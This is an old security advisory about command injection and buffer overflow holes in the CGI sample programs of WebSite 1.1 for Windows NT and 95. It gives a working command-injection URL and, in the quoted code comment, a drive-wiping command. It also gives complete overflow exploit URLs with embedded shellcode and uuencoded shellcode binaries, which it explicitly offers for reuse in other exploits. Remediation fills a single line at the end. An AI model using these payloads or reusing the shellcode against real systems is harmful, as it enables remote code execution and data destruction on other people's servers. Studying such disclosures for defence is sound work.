DATE:  
COMMAND                                            SOURCE: 
                                                   AUTHOR: 
  WebSite

SYSTEMS AFFECTED

  WinNT, Win95 WebSite 1.1
  

PROBLEM


    There're some nice security holes in WebSite v1.1e for Windows  NT
    and '95, in the CGI example programs.

    The first thing that You  will noticed is about the  scripts, they
    have the following lines in cgi-dos/args.cmd (and some others):

        rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
        rem a query string of xxx&del+/s+c:\*.*  Your hard drive gets
        rem erased!! Same goes for args and extra path info!!!

    and then some lines like this:

        echo QUERY_STRING="%QUERY_STRING%"

    The exploit can be:

        http://website.host/cgi-dos/args.cmd?"&any+dos+command"

    There's    also    an    example    C    program,    compiled   to
    cgi-shl/win-c-sample.exe,   with    the   source    provided    in
    cgi-src/win-c-sample/win-c-sample.c,  and  the  following  line in
    there:

        char *argv[32]; // Max 32 command line args

    That's a  WinMain local  variable, and  is passed  to SplitArgs(),
    which does no  bounds checking while  filling it with  the command
    line  parameters.  You  know  what  that  means  --  a nice buffer
    overflow.

    Here are the  exploits (Solar splited  the long URLs  into several
    lines), you can use any  dos command in them (replace  spaces with
    _'s):

    WinNT (any version?):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

    Win95 (the release version only, will crash others!):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm

    The example dos commands just copy the WebSite's readme.1st  file,
    so  you  can  later  check   if  the  exploit  worked  by   trying
    http://website.host/x1.htm.  Note  that the server  should respond
    to these exploits with an "Error: no blank line separating  header
    and data",  because of  the "1  file(s) copied"  message appearing
    without a  blank line  before it  (which is  required for HTTP; if
    you need a command's  output, you can redirect  it to a file,  and
    get that file via HTTP with a separate request).

    The solution Solar used in the  exploits above is doing a call  to
    fixed  kernel  offset.  Actually,  the  WinNT exploit does pattern
    searches in  the kernel  (due to  the number  of different  kernel
    versions  out  there),  while  the  Win95  one  uses fixed offsets
    (Solar don't have Win95 himself,  thanks must go to Lord  Byte for
    loading  his  WinIce  and  telling  him  the  offsets).  The   two
    functions I use are WinExec and ExitProcess.

    Here're the two  shellcodes in binary,  uuencoded, so you  can use
    them in your own exploits if you wish.

begin 644 shell_nt.bin
M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z
F4$`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$`77P@^D<_]'[
`
end

begin 644 shell_95.bin
M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8
,7WQ?N5A0?&`#RO_1
`
end

    Credit for this discovery goes to Solar Designer.



EXPLOIT

  

SOLUTION


    Just remove the examples after You, the Webmaster, have checked
    them out. Also, the holes will probably get fixed in the next
    WebSite release.